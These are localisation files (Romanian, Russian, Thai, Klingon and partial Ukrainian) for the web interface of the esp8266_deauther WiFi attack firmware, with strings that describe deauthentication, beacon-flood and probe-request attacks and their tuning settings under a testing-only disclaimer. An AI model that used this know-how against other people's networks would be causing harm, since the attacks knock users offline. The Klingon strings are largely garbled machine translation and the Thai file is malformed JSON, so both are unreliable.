"deauth_desc": "Închide conexiunea dispozitivelor WiFi prin trimiterea cadrelor de autentificare pentru a accesa punctele și dispozitivele client selectate.\nAcest lucru este posibil numai pentru că o mulțime de dispozitive nu utilizează standardul 802.11w-2009 care oferă o protecție împotriva acestui atac.\n- Selectați doar o singură țintă! Când selectați mai multe ținte care rulează pe diferite canale și începeți atacul, acesta va comuta rapid între acele canale și nu aveți nicio șansă să vă reconectați la interfața web.\n",
"beacon_desc": "Pachetele de baliză sunt utilizate pentru a face publicitate punctelor de acces. Prin trimiterea continuă a pachetelor de baliză, va părea că ați creat noi rețele WiFi.\nPuteți specifica numele rețelei sub SSID-uri.",
"probe_desc": "Solicitările sonde sunt trimise de dispozitivele client pentru a întreba dacă o rețea cunoscută este în apropiere.\nUtilizați acest atac pentru a confunda trackerele WiFi solicitând rețelele pe care le-ați specificat în lista SSID.\nEste puțin probabil că veți vedea impactul acestui atac cu rețeaua dvs. de domiciliu.",
"setting_version": "Versiunea numarul, i.e. v2.0.\nAceastă setare poate fi modificată numai în codul sursă.",
"setting_ssid" : "SSID al punctului de acces utilizat pentru interfața web (dacă este activat).\nLungimea trebuie să fie cuprinsă între 1 și 31 de caractere.",
"setting_password": "Parola punctului de acces utilizat pentru interfața web (dacă este activată).\nLungimea trebuie să aibă între 8 și 31 de caractere.",
"setting_channel": "Canal WiFi prestabilit utilizat la pornire.",
"setting_hidden": "Ascunde punctul de acces utilizat pentru interfața web (dacă este activat).",
"setting_captivePortal": "Activează portalul captiv pentru punctul de acces (dacă este activat).",
"setting_autosave": "Permite salvarea automată a SSID-urilor, a numelor dispozitivelor și a setărilor.",
"setting_autosavetime": "Interval de timp pentru salvarea automată în milisecunde.",
"setting_display": "Activează interfața de afișare.",
"setting_displayTimeout": "Timpul în secunde după care afișajul se stinge când este inactivă.\nPentru a dezactiva expirarea timpului de afișare, setați-l la 0.",
"setting_serial": "Activează interfața serială.\nNu este recomandat să-l dezactivați!",
"setting_serialEcho": "Permite ecou pentru fiecare mesaj primit peste serial.",
"setting_web": "Activează interfața web.",
"setting_webSpiffs": "Activează SPIFFS pentru toate fișierele web.",
"setting_led": "Permite caracteristica LED (RGB).",
"setting_maxch": "Max. canal pentru scanare.\nUS = 11, EU = 13, Japonia = 14.",
"setting_macAP": "Adresa MAC folosită pentru modul punct de acces.\nRețineți că adresa MAC va înlocui numai adresa MAC internă când modul de punct de acces este activat.",
"setting_macSt": "Adresa MAC folosită pentru modul stație.\nRețineți că adresa MAC va înlocui numai adresa MAC internă când modul stație este activat.",
"setting_chtime": "Timp pentru scanarea unui canal înainte de a trece la următoarea în milisecunde (numai dacă este activată alunecarea canalului).",
"setting_minDeauths": "Numărul minim de cadre de autentificare la scanare pentru a schimba modul LED-uri în modul de atestat.",
"setting_attacktimeout": "După ce timp (în secunde) atacul se va opri automat.\nSetați-l la 0 pentru al dezactiva.",
"setting_forcepackets": "Câte încercări de a trimite un pachet.\nSetați această valoare mai mare dacă doriți să obțineți o rată de pachet mai bună într-o zonă ocupată.\nAveți grijă ca această setare să facă aparatul mai lent sau mai instabil.\nValoarea maximă este 255!",
"setting_deauthspertarget": "Câte cadre de autentificare și de dezasociune sunt trimise pentru fiecare țintă.",
"setting_deauthReason": "Codul motiv care este trimis cu cadrele de deaut pentru a indica dispozitivului destinație de ce conexiunea va fi închisă.",
"setting_beaconchannel": "Dacă este activată, va trimite toate cadrele pe diferite canale atunci când rulează un atac de baliză.",
"setting_beaconInterval": "Dacă este setat corect, balize vor fi trimise în fiecare secundă. Dacă este setat la false, intervalul va fi de 100ms.\nUn interval mai lung înseamnă mai multă stabilitate și mai puțin spam de pachete, dar ar putea dura mai mult până când clienții găsesc ssids atunci când scanează.",
"setting_randomTX": "Permite puterea de transmisie randomizată pentru trimiterea cadrelor de baliză și a sondei.",
"setting_probesPerSSID": "Câte cadre de solicitare a sondei sunt trimise pentru fiecare SSID.",
"setting_lang": "Limba prestabilită pentru interfața web.\nAsigurați-vă că fișierul de limbă există!"
} |
|
esp8266_deauther-2/web_interface/lang/ru.lang | {
"lang": "ru",
"warning": "ПРЕДУПРЕЖДЕНИЕ",
"disclaimer": "Этот проект можно использовать только для тестирования и в образовательных целях. \n Используйте его только для своих сетей и устройств! \n Использует действительные фреймы Wi-Fi, описанные в стандарте IEEE 802.11, не блокирует и не прерывает какие-либо частоты.\nПожалуйста, ознакомьтесь с правовыми нормами в своем страны, прежде чем использовать этот код. \n\nПожалуйста, не обращайтесь к этому проекту как «jammer», что полностью подрывает реальную цель этого проекта! \nЕсли вы это сделаете, это только докажет, что вы ничего не понимали из того, что этот проект означает. \n Публикация контента об этом без надлежащего объяснения показывает, что вы делаете это только за клики, славу и деньги и не уважаете интеллектуальную собственность, сообщество за ней и борьбу за лучший стандарт WiFi . \n\nДля получения дополнительной информации посетите:",
"disclaimer-button": "Я прочитал и понял сообщение выше",
"reload": "Обновить",
"scan": "Сканировать",
"ssids": "SSIDs",
"attacks": "Атаки",
"settings": "Конфигурация",
"info": "Информация",
"info_span": "Информация: ",
"all": "Все",
"channel": "Канал",
"devices": "Сохранить устройство",
"select_all": "Выбрать все",
"deselect_all": "Отменить все",
"remove_all": "Удалить все",
"station_scan_time": "Время сканирования станций",
"new": "Новое",
"save": "Сохранить",
"add": "Добавить",
"add_selected": "Клонировать выбранные APs",
"overwrite": "Затереть",
"time_interval": "Временной интервал",
"number": "Номер",
"targets": "Цели",
"scan_info": "- Нажмите «Сканировать» и подождите, пока синий светодиод на вашей плате не погаснет (или не станет зеленым), а затем нажмите «Обновить». \n- Веб-интерфейс будет недоступен во время сканирования сети, и вам нужно будет снова подключиться! \n- Пожалуйста, выберите только одну цель! \n",
"ssids_info": "- Этот список SSID используется для атаки маяка и зонда. \n- Каждый SSID может содержать до 32 символа. \n- Не забудьте нажать «Сохранить», когда вы отредактировали SSID. \n- Вы должны нажать «Обновить» после клонирования SSID. \n",
"attack_info": "- Вы можете потерять соединение при запуске атаки! \n- Вам нужно выбрать цель для атаки deauth. \n- Вам нужен сохраненный SSID для атаки маяка и зонда. \n- Нажмите перезагрузить, чтобы обновить скорость передачи пакетов. \n",
"settings_info": "- Некоторые настройки требуют перезагрузки. \n- Нажмите «Сохранить», чтобы убедиться, что ваши изменения применены. \n",
"info_disclaimer": "В случае непредвиденной ошибки перезагрузите сайт и посмотрите на последовательный монитор для дальнейшей отладки.",
"start_stop": "СТАРТ / СТОП",
"start": "СТАРТ",
"stop": "СТОП",
"wifi_off": "WiFi Выключить",
"reboot": "Перезагрузить",
"reset": "Сброс",
"enable_random": "Включить Рандомный режим",
"disable_random": "Выключить Рандомный режим",
"random_desc": "Включите случайный режим для создания случайного списка SSID в заданный интервал.",
"deauth_desc": "Закрывает подключение WiFi-устройств, отправляя фреймы деаутентификации для доступа к точкам и выбранным клиентским устройствам. \nЭто возможно только потому, что многие устройства не используют стандарт 802.11w-2009, который обеспечивает защиту от этой атаки. \n- Выберите только одну цель! Когда вы выбираете несколько целей, которые запускаются на разных каналах и запускают атаку, они быстро переключаются между этими каналами, и у вас нет шансов повторно подключиться к веб-интерфейсу. \n",
"beacon_desc": "Маяковые пакеты используются для рекламы точек доступа. Постоянно отправляя пакеты маяковых радиостанций, это будет выглядеть так, как будто вы создали новые WiFi-сети. \nВы можете указать сетевые имена под SSID.",
"probe_desc": "Запросы зонда отправляются клиентскими устройствами, чтобы спросить, находится ли известная сеть поблизости. \nИспользуйте эту атаку, чтобы запутать WiFi-трекеры, запросив сети, которые вы указали в списке SSID. \nВ маловероятно, что вы увидите какое-либо влияние этой атаки на ваш домашнюю сеть.",
"setting_version": "Номер версии, т. Е. V2.0. \nЭту настройку можно изменить только в исходном коде.",
"setting_ssid" : "SSID точки доступа, используемой для веб-интерфейса (если разрешено). \n Длина должна быть от 1 до 31 символа.",
"setting_password": "Пароль точки доступа, используемой для веб-интерфейса (если включен). \n Длина должна быть от 8 до 31 символа.",
"setting_channel": "Стандартный WiFi-канал, который используется при запуске.",
"setting_hidden": "Скрывает точку доступа, которая используется для веб-интерфейса (если включена).",
"setting_captivePortal": "Включает доступный портал для точки доступа (если включен).",
"setting_autosave": "Включает автоматическое сохранение SSID, имен устройств и настроек.",
"setting_autosavetime": "Интервал времени для автоматического сохранения в миллисекундах.",
"setting_display": "Включает интерфейс отображения.",
"setting_displayTimeout": "Время в секундах, после которого дисплей выключается, когда он неактивен. \nЧтобы отключить таймаут отображения, установите его в 0.",
"setting_serial": "Включает последовательный интерфейс. \nНе рекомендуется не отключать его!",
"setting_serialEcho": "Включает эхо для каждого входящего сообщения через последовательный порт.",
"setting_web": "Включает веб-интерфейс.",
"setting_webSpiffs": "Включает SPIFFS для всех веб-файлов.",
"setting_led": "Включает функцию (RGB) LED.",
"setting_maxch": "Максимальный канал для сканирования. \nUS = 11, EU = 13, Япония = 14.",
"setting_macAP": "MAC-адрес, используемый для режима точки доступа. \nОбратите внимание, что MAC-адрес заменяет только внутренний MAC-адрес, когда включен режим точки доступа.",
"setting_macSt": "MAC-адрес, используемый для режима станции. \nПожалуйста, обратите внимание, что MAC-адрес заменит только внутренний MAC-адрес, когда включен режим станции.",
"setting_chtime": "Время сканирования одного канала перед переходом к следующему в миллисекундах (только если включен переключение каналов).",
"setting_minDeauths": "Минимальное количество кадров деаутентификации при сканировании для изменения светодиода в режим deauth.",
"setting_attacktimeout": "Через какое время (в секундах) атака автоматически остановится. \nУстановите ее на 0, чтобы отключить ее.",
"setting_forcepackets": "Сколько попыток отправить пакет. \nУстановите это значение выше, если вы хотите достичь более высокой скорости передачи пакетов в загруженной области. \nУбедитесь, что этот параметр может сделать устройство более медленным или более неустойчивым. \nМаксимальное значение - 255!",
"setting_deauthspertarget": "Сколько кадров деаутентификации и дизассемблирования отправляется для каждой цели.",
"setting_deauthReason": "Код причины, который отправляется с кадрами deauth, чтобы сообщить целевому устройству, почему соединение будет закрыто.",
"setting_beaconchannel": "Если включено, будет отправлено все кадры по разным каналам при запуске атаки маяка.",
"setting_beaconInterval": "Если установлено true, маяки будут отправляться каждую секунду. Если установлено значение false, интервал будет равен 100 мкс. \nA более длительный интервал означает большую стабильность и меньше спама пакетов, но это может занять больше времени, пока клиенты не найдут ssids при сканировании.",
"setting_randomTX": "Позволяет рандомизированную мощность передачи для отправки кадров маяка и зонда запроса.",
"setting_probesPerSSID": "Сколько кадров запроса запроса отправляется для каждого SSID.",
"setting_lang": "Язык по умолчанию для веб-интерфейса. \nУбедитесь, что языковой файл существует!"
} |
|
esp8266_deauther-2/web_interface/lang/th.lang | {
"lang": "th",
"warning": "คำเตือน",
"disclaimer": "โครงการนี้เป็นหลักฐานของแนวคิดสำหรับการทดสอบและเพื่อการศึกษา \n ทั้ง ESP8266 และ SDK ไม่ได้ถูกสร้างขึ้นหรือมีวัตถุประสงค์เพื่อวัตถุประสงค์ดังกล่าว ข้อบกพร่องสามารถเกิดขึ้นได้! \n\n ใช้กับเครือข่ายและอุปกรณ์ของคุณเท่านั้น! \n\n ใช้เฟรม Wi-Fi ที่ถูกต้องซึ่งอธิบายไว้ในมาตรฐาน IEEE 802.11 และไม่ปิดกั้นหรือรบกวนความถี่ใด ๆ \n โปรดตรวจสอบข้อบังคับทางกฎหมายใน ประเทศก่อนที่จะใช้ \n\n โปรดอย่าอ้างถึงโครงการนี้ว่า \ "jammer \" ซึ่งทำลายวัตถุประสงค์ที่แท้จริงของโครงการนี้โดยสิ้นเชิง! \n หากคุณทำเช่นนั้นจะพิสูจน์ได้ว่าคุณไม่เข้าใจอะไรเลย โครงการนี้มีไว้สำหรับ \n การเผยแพร่เนื้อหาเกี่ยวกับสิ่งนี้โดยไม่มีคำอธิบายที่เหมาะสมแสดงว่าคุณทำเพื่อการคลิกชื่อเสียงและ / หรือเงินและไม่เคารพทรัพย์สินทางปัญญาชุมชนที่อยู่เบื้องหลังและการต่อสู้เพื่อมาตรฐาน WiFi ที่ดีกว่า . \n\n สำหรับข้อมูลเพิ่มเติม:",
"disclaimer-button": "ฉันได้อ่านและทำความเข้าใจกับประกาศด้านบน",
"reload": "Reload",
"scan": "สแกน",
"ssids": "SSIDs",
"attacks": "โจมตี",
"settings": "ตั้งค่า",
"info": "ข้อมูล",
"info_span": "ข้อมูล: ",
"all": "ทั้งหมด",
"channel": "ทั้งหมด",
"devices": "อุปกรณ์ที่บันทึกไว้",
"select_all": "เลือกทั้งหมด",
"deselect_all": "ยกเลิกการเลือกทั้งหมด",
"remove_all": "ลบทั้งหมด",
"station_scan_time": "เวลาสแกน Station",
"new": "New",
"save": "บันทึก",
"add": "เพิ่ม",
"add_selected": "โคลน APs ที่เลือกไว้",
"overwrite": "เขียนทับ",
"time_interval": "ช่วงเวลา",
"number": "Number",
"targets": "เป้าหมาย",
"scan_info": "- คลิกสแกนแล้วรอจนกระทั่งไฟ LED สีฟ้าบนบอร์ดของคุณดับ (หรือเปลี่ยนเป็นสีเขียว) จากนั้นคลิกที่โหลด \n- เว็บอินเตอร์เฟสจะไม่สามารถใช้งานได้ในระหว่างการสแกนสถานีและคุณจะต้องเชื่อมต่อใหม่! \n- โปรดเลือก เป้าหมายเดียวเท่านั้น! \n",
"ssids_info": "- รายการ SSID นี้ใช้สำหรับการโจมตีด้วยสัญญาณและโพรบ \n - แต่ละ SSID สามารถมีอักขระได้สูงสุด 32 ตัว \n - อย่าลืมคลิกบันทึกเมื่อคุณแก้ไข SSID \n - คุณต้องคลิกโหลดซ้ำหลังจากการโคลน SSIDs. \n",
"attack_info": "- คุณอาจสูญเสียการเชื่อมต่อเมื่อเริ่มการโจมตี! \n- คุณต้องเลือกเป้าหมายสำหรับการโจมตีแบบ deauth \n- คุณต้องมี SSID ที่บันทึกไว้สำหรับการโจมตีแบบบีคอนและการสอบสวน \n- คลิกที่โหลดซ้ำเพื่อรีเฟรชอัตราแพ็คเก็",
"settings_info": "- การตั้งค่าบางอย่างจำเป็นต้องรีบูต \n- คลิกบันทึกเพื่อให้แน่ใจว่ามีการใช้การเปลี่ยนแปลงของคุณ \n",
"info_disclaimer": "ในกรณีที่มีข้อผิดพลาดที่ไม่คาดคิดโปรดโหลดไซต์ใหม่อีกครั้งและดูการตรวจสอบพอร์ตอนุกรมสำหรับการดีบักเพิ่มเติม",
"start_stop": "START / STOP",
"start": "START",
"stop": "STOP",
"wifi_off": "ปิด Wifi",
"reboot": "รีบูต",
"reset": "รีเซ็ท",
"enable_random": "เปิดโหมด Random,
"disable_random": "ปิดโหมด Random",
"random_desc": "เปิดใช้งานโหมดสุ่มเพื่อสร้างรายการ SSID แบบสุ่มในช่วงเวลาที่กำหนด",
"deauth_desc": "ปิดการเชื่อมต่อของอุปกรณ์ WiFi โดยส่งเฟรมการตรวจสอบสิทธิ์ไปยังจุดเข้าใช้งานและอุปกรณ์ไคลเอนต์ที่คุณเลือก \n สิ่งนี้เป็นไปได้เพียงเพราะอุปกรณ์จำนวนมากไม่ได้ใช้มาตรฐาน 802.11w-2009 ที่ให้การป้องกัน โจมตี. \n- โปรดเลือกเพียงหนึ่งเป้าหมายเท่านั้น! เมื่อคุณเลือกเป้าหมายหลายรายการที่ทำงานในช่องทางที่แตกต่างกันและเริ่มการโจมตีมันจะสลับไปมาระหว่างช่องสัญญาณเหล่านั้นอย่างรวดเร็วและคุณไม่มีโอกาสเชื่อมต่อกับเว็บอินเตอร์เฟสอีกครั้ง \n ",
"beacon_desc": "แพ็คเก็ต Beacon ใช้เพื่อโฆษณาจุดเชื่อมต่อโดยการส่งแพ็คเก็ตสัญญาณอย่างต่อเนื่องจะดูเหมือนว่าคุณสร้างเครือข่าย WiFi ใหม่ \n คุณสามารถระบุชื่อเครือข่ายภายใต้ SSID",
"probe_desc": "คำขอโพรบถูกส่งโดยอุปกรณ์ไคลเอนต์เพื่อสอบถามว่ามีเครือข่ายที่รู้จักอยู่ใกล้ ๆ หรือไม่ \n ใช้การโจมตีนี้เพื่อสร้างความสับสนให้กับตัวติดตาม WiFi โดยขอเครือข่ายที่คุณระบุในรายการ SSID \n ไม่น่าเป็นไปได้ การโจมตีครั้งนี้กับเครือข่ายในบ้านของคุณ ",
"setting_version": "หมายเลขเวอร์ชัน, เช่น v2.0. \n การตั้งค่านี้สามารถเปลี่ยนแปลงได้ในซอร์สโค้ดเท่านั้น",
"setting_ssid": "SSID ของจุดเชื่อมต่อที่ใช้สำหรับเว็บอินเตอร์เฟส (หากเปิดใช้งาน) \n ความยาวต้องอยู่ระหว่าง 1 ถึง 31 อักขระ",
"setting_password": "รหัสผ่านของจุดเชื่อมต่อที่ใช้สำหรับเว็บอินเตอร์เฟส (หากเปิดใช้งาน) \n ความยาวต้องอยู่ระหว่าง 8 ถึง 31 อักขระ",
"setting_channel": "แชนเนล WiFi เริ่มต้นที่ใช้เมื่อเริ่มต้น",
"setting_hidden": "ซ่อนจุดเชื่อมต่อที่ใช้สำหรับเว็บอินเตอร์เฟส (หากเปิดใช้งาน)",
"setting_captivePortal": "เปิดใช้งานพอร์ทัลเชลยสำหรับจุดเข้าใช้งาน (ถ้าเปิดใช้งาน)",
"setting_autosave": "เปิดใช้งานการบันทึก SSID ชื่ออุปกรณ์และการตั้งค่าอัตโนมัติ",
"setting_autosavetime": "ช่วงเวลาสำหรับการบันทึกอัตโนมัติเป็นมิลลิวินาที",
"setting_display": "เปิดใช้งานอินเทอร์เฟซการแสดงผล",
"setting_displayTimeout": "เวลาในหน่วยวินาทีหลังจากที่จอแสดงผลปิดทำงานเมื่อไม่ได้ใช้งาน \n หากต้องการปิดใช้งานการหมดเวลาแสดงผลให้ตั้งค่าเป็น 0",
"setting_serial": "เปิดใช้งานส่วนต่อประสานอนุกรม \n ขอแนะนำไม่ให้ปิดใช้งาน!",
"setting_serialEcho": "เปิดใช้งาน echo สำหรับแต่ละข้อความขาเข้าผ่านซีเรียล",
"setting_web": "เปิดใช้งานเว็บอินเตอร์เฟส",
"setting_webSpiffs": "เปิดใช้งาน SPIFFS สำหรับไฟล์เว็บทั้งหมด",
"setting_led": "เปิดใช้งานคุณสมบัติ LED (RGB)",
"setting_maxch": "แชนเนลสูงสุดที่จะสแกน \nUS = 11, EU = 13, Japan = 14. ",
"setting_macAP": "ที่อยู่ MAC ที่ใช้สำหรับโหมดจุดเข้าใช้งาน \n โปรดทราบว่าที่อยู่ MAC จะแทนที่ที่อยู่ MAC ภายในเท่านั้นเมื่อเปิดใช้งานโหมดจุดเข้าใช้งาน",
"setting_macSt": "ที่อยู่ MAC ที่ใช้สำหรับโหมดสถานี \n โปรดทราบว่าที่อยู่ MAC จะแทนที่ที่อยู่ MAC ภายในเท่านั้นเมื่อเปิดใช้งานโหมดสถานี",
"setting_chtime": "เวลาสำหรับการสแกนหนึ่งช่องก่อนที่จะไปยังช่องถัดไปเป็นมิลลิวินาที (เฉพาะเมื่อเปิดใช้งานการกระโดดของช่อง)",
"setting_minDeauths": "จำนวนขั้นต่ำของการพิสูจน์ตัวตนเฟรมเมื่อสแกนเพื่อเปลี่ยน LED เป็นโหมด deauth",
"setting_attacktimeout": "หลังจากจำนวนเวลา (เป็นวินาที) การโจมตีจะหยุดโดยอัตโนมัติ \n ตั้งค่าเป็น 0 เพื่อปิดการใช้งาน",
"setting_forcepackets": "ความพยายามในการส่งแพ็กเก็ตออกไปกี่ครั้ง \n ตั้งค่านี้ให้สูงขึ้นหากคุณต้องการอัตราการส่งแพ็กเก็ตที่ดีขึ้นในพื้นที่ไม่ว่าง \n โปรดระวังการตั้งค่านี้อาจทำให้อุปกรณ์ช้าลงหรือไม่เสถียร \nMax คือ 255! ",
"setting_deauthspertarget": "มีการส่งเฟรมการยกเลิกการตรวจสอบสิทธิ์และการยกเลิกการเชื่อมโยงจำนวนเท่าใดสำหรับแต่ละเป้าหมาย",
"setting_deauthReason": "รหัสเหตุผลที่ส่งมาพร้อมกับเฟรม deauth เพื่อบอกอุปกรณ์เป้าหมายว่าทำไมการเชื่อมต่อจะถูกปิด",
"setting_beaconchannel": "หากเปิดใช้งานจะส่งเฟรมทั้งหมดในช่องทางที่แตกต่างกันเมื่อเรียกใช้การโจมตีด้วยสัญญาณบีคอน",
"setting_beaconInterval": "หากตั้งค่าจริงบีคอนจะถูกส่งออกทุกวินาทีหากตั้งค่าเป็นเท็จช่วงเวลาจะเป็น 100ms \n ช่วงเวลาที่ยาวนานขึ้นหมายถึงความเสถียรที่มากขึ้นและการส่งสแปมน้อยลง แต่อาจใช้เวลานานกว่านี้ เอสเอสเมื่อสแกน ",
"setting_randomTX": "เปิดใช้งานการส่งพลังงานแบบสุ่มสำหรับการส่งสัญญาณและเฟรมคำขอโพรบ",
"setting_probesPerSSID": "มีการส่งเฟรมคำขอโพรบจำนวนเท่าใดสำหรับแต่ละ SSID",
"setting_lang": "ภาษาเริ่มต้นสำหรับเว็บอินเตอร์เฟส \n โปรดแน่ใจว่ามีไฟล์ภาษาอยู่!" |
|
esp8266_deauther-2/web_interface/lang/tlh.lang | {
"lang": "tlh",
"warning": "WARNING",
"disclaimer": "jInmol tob concept waH 'ej educational ngoQ. nneither qej esp8266, 'ej \nsdk joq vIq ngoQ qach. laH may' yotlhDaq ghew! nnuse 'oH neH against \nnetworks jan 'ej! mub regulations neH Sep check nnit lo' neH ieee 802.11\n Hol Del 'ej wej bot pagh vay' Se'. nplease nIS Dalbogh qeylIS-fi valid \npa' it.nnplease yIlo' Qo' refer je \"jammer jInmol\", wImevmo' jInmol real\n totally undermines 'e'! nif SoHvaD, 'e' vay' nuq for. npublishing 'a \nghIH vIHtaHbogh Hutlh Hutlh proper Qam jInmol vIchel yaj SoH neH tob 'oH\n 'e' neH ruch clicks, fame qoj Huch 'ej pagh wIqelDI', maHeDnIS \nintellectual bang ghaj, latlh De' Such De''e' 'oH je SuvtaHvIS Dunmo' \nwifi standard.nnfor community cha' SuvwI' explanation:",
"disclaimer-button": "laD je tu' wovbe' yaj jIH",
"reload": "Reload",
"scan": "Hotlh",
"ssids": "SSIDs",
"attacks": "HIv",
"settings": "HIjmeH",
"info": "De'",
"info_span": "De': ",
"all": "Hoch",
"channel": "Channel",
"devices": "toD jan",
"select_all": "Hoch wIv",
"deselect_all": "Hoch de-wIv",
"remove_all": "Hoch teq",
"station_scan_time": "yaH Hotlh poH",
"new": "chu'",
"save": "choq",
"add": "boq",
"add_selected": "wIv ap clone",
"overwrite": "rIn ghItlh",
"time_interval": "poH interva",
"number": "ml'",
"targets": "ray'",
"scan_info": "-Hotlh click 'ej loS until tlhe' (pagh choH SuD SuD led tIj), vaj click Reload. n-'ej bebvo' interface unavailable during yaH Hotlh 'ej reconnect Daghaj! DubelmoHchugh neH wa' DoS wIv n-! n\n",
"ssids_info": "-lo' tetlh ssid beacon 'op Reload click qaSpu'DI' ssid. n cloning nejwI' HIv. n-Hoch ssid laH Da'elDI' vItoDmeH ghorgh ssid.n-SoH edited SoH click ghewmey lIj 32 vuDmey'e'. \n",
"attack_info": "-connection chaq luj SoH HeghDI' HIv starting! n-DoS wIv bImejnIS deauth reload HIv. n-toD ssid nIS beacon 'ej HIv. n-Click nejwI' packet rate. n refresh",
"settings_info": "-toD reboot. n-Click vay' be 'e' applied choH, qatlh poQ 'op settings. n",
"info_disclaimer": "in case of unexpected Qagh, nuqneH Daq reload 'ej legh jIH serial qaStaHvIS debugging.",
"start_stop": "start ghap mev",
"start": "START",
"stop": "mev",
"wifi_off": "wofo DoH",
"reboot": "re DaS",
"reset": "re HIjmeH",
"enable_random": "Enable Random Mode",
"disable_random": "Disable Random Mode",
"random_desc": "random mode random ssid yoSvetlhDaq generate reH wInobqang interval enable.",
"deauth_desc": "wifi jan connection SoQ pong jan wIv SoHvaD ngeH deauthentication Dalbogh naw' lang client 'ej. nthis DuH neH SeH 802.11w ghewmey lo' jan nIvbogh-2009 Hol against HIv. n-protection offers nuqneH neH wa' DoS wIv! ghorgh multiple DoS 'e' qet pIm channels 'ej start HIv, nom leQ 'oH SabtaHbogh channels 'ej pagh 'eb reconnect 'ej bebvo' interface. n Daghaj wIv SoH",
"beacon_desc": "DanoHmeH beacon packets naw' lang advertise. pong continuously beacon packets 'e' yIQoy, 'oH ngeH network pong bopummeH ssid laH per legh rur chu' wifi networks. nyou chenmoH.",
"probe_desc": "ngeH nejwI' requests pong client jan tlhob vaj Sov network Sum. nuse networks wifi trackers mIS pong botlhobbogh HIv 'e' vay' mup DaqaSmoHbej pong HIv je juH Dachegh network per neH ssid tetlh. nit's ghaytanHa' SoH.",
"setting_version": "laH neH choH version mI', i.e. v2.0.nthis HIjmeH qaStaHvIS Hal ngoq.",
"setting_ssid": "naw' lang lo' 'ej bebvo' interface (vaj enabled) ssid. ghob'e' nthe 'ab SabtaHbogh vuDmey'e' 1 'ej 31.",
"setting_password": "naw' lang lo' 'ej bebvo' interface (vaj enabled) mu'wIj. ghob'e' nthe 'ab SabtaHbogh vuDmey'e' 8 'ej 31.",
"setting_channel": "default wifi channel choHwI'maj HeghDI' starting.",
"setting_hidden": "Hides the access point that is used for the web interface (if enabled).",
"setting_captivePortal": "naw' lang choHwI'maj 'ej bebvo' interface (vaj enabled) So'.",
"setting_autosave": "automatic saving ssid, jan pong 'ej settings enables.",
"setting_autosavetime": "poH interval automatic saving neH milliseconds.",
"setting_display": "interface cha' enables.",
"setting_displayTimeout": "qaSpu'DI' tlhe' bey' DoH HeghDI' inactive cha'DIch poH. bey' timeout Qotlh nto, 'oH lut'e' 0.",
"setting_serial": "serial interface. nit's 'oH Qotlh chup enables!",
"setting_serialEcho": "Enables echo for each incoming message over serial.",
"setting_web": "'ej bebvo' interface enables.",
"setting_webSpiffs": "Enables SPIFFS for all web files.",
"setting_led": "(rgb) led feature enables.",
"setting_maxch": "max. channel Hotlh. nus 11, eu = 13, nIpon = = 14.",
"setting_macAP": "mac SoQ lo' naw' lang mode. nplease note 'e' internal mac SoQ neH ngaSwI' yuvtlhe' wIngaQmoHta'DI' mac SoQ HeghDI' enabled accesspoint mode.",
"setting_macSt": "mac SoQ yaH mode. nplease note 'e' internal mac SoQ neH ngaSwI' yuvtlhe' wIngaQmoHta'DI' mac SoQ HeghDI' enabled yaH mode lo'.",
"setting_chtime": "Time for Qo'noS poH wa' channel Hotlh pa' ghoS jIbuSchoH neH milliseconds (neH vaj enabled channel hopping). one channel before going to the next in milliseconds (only if channel hopping is enabled).",
"setting_minDeauths": "deauthentication Dalbogh HeghDI' Hotlh led wIQaw'laH deauth mode minimum mI'.",
"setting_attacktimeout": "qaSpu'DI' poH (qaStaHvIS lup) amount nuq mev HIv automatically. nset 'oH 0 'oH Qotlh.",
"setting_forcepackets": "HoSghajbej janvam slower pagh vI'Iprup unstable vutmeH setting rate neH busy mIchHom. nbe chong 'ar nID lo'laHghach veb lungeH packet. nset vaj packet Dunmo' chav DaneH'a'. nmax lo'laHghach 255!",
"setting_deauthspertarget": "ngeH 'ar deauthentication disassociation 'ej Dalbogh Hoch DoS.",
"setting_deauthReason": "meq ngoq 'e' ngeH deauth Dalbogh jatlh DoS jan qatlh SoQ connection.",
"setting_beaconchannel": "vaj enabled, vaj Hoch Dalbogh ngeH pIm channels HeghDI' beacon HIv qet.",
"setting_beaconInterval": "vaj HIjmeH teH, ngeH beacons Hoch cha'DIch. tlhoy HIjmeH ngeb, interval 100ms.na nI'qu' neH stability 'ej qup spamming packets qej interval 'ach 'oH laH tlhap nI'qu' until ssids vItu' clients HeghDI' Hotlh.",
"setting_randomTX": "HoS ngeH beacon 'ej request Dalbogh nejwI' enables randomized transmission.",
"setting_probesPerSSID": "ngeH 'ar nejwI' request Dalbogh Hoch ssid.",
"setting_lang": "'ej bebvo' interface. nbe be nIv'e' Hol teywI' Hol default!"
} |
|
esp8266_deauther-2/web_interface/lang/uk.lang | {
"lang": "uk",
"warning": "ПОПЕРЕДЖЕННЯ",
"disclaimer": "Цей проект можна використовувати тільки для тестування і в освітніх цілях. \nВикористовуйте його тільки для своїх мереж і пристроїв! \nВикористовує дійсні фрейми Wi-Fi, описані в стандарті IEEE 802.11, не блокує і не перериває які-небудь частоти.\nБудь ласка, ознайомтеся з правовими нормами у своєму країни, перш ніж використовувати цей код. \n\nБудь ласка, не звертайтеся до цього проекту як «jammer», що повністю підриває реальну мету цього проекту! \nЯкщо ви це зробите, це тільки доведе, що ви нічого не розуміли з того, що цей проект означає. \nПублікація контенту про це без належного пояснення показує, що ви робите це тільки за кліки, славу і гроші, і не поважаєте інтелектуальну власність, співтовариство за нею і боротьбу за кращий стандарт WiFi . \n\nДля отримання додаткової інформації відвідайте:",
"disclaimer-button": "Я прочитав і зрозумів повідомлення вище",
"reload": "Оновити",
"scan": "Сканувати",
"ssids": "SSIDs",
"attacks": "Атаки",
"settings": "Конфігурація",
"info": "Інформація",
"info_span": "Інформація: ",
"all": "Всі",
"channel": "Канал",
"devices": "Зберегти пристрій",
"select_all": "Вибрати все",
"deselect_all": "Відмінити всі",
"remove_all": "Видалити всі",
"station_scan_time": "Час сканування станцій",
"new": "Нове",
"save": "Зберегти",
"add": "Додати",
"add_selected": "Клонувати вибрані APs",
"overwrite": "Затерти",
"time_interval": "Часовий інтервал",
"number": "Номер",
"targets": "Цілі",
"scan_info": "- Натисніть кнопку «Сканувати» і почекайте, поки синій світлодіод на вашій платі не згасне (чи не стане зеленим), а потім натисніть кнопку «Оновити». \n- Веб-інтерфейс буде недоступний під час сканування мережі, і вам потрібно буде знову підключитися! \n- Будь ласка виберіть тільки одну мету! \n",
"ssids_info": "- Цей список SSID використовується для атаки маяка і зонда. \n- Кожен SSID може містити до 32 символу. \n- Не забудьте натиснути «Зберегти», коли ви відредагували SSID. \n- Ви повинні натиснути «Оновити» після клонування SSID. \n",
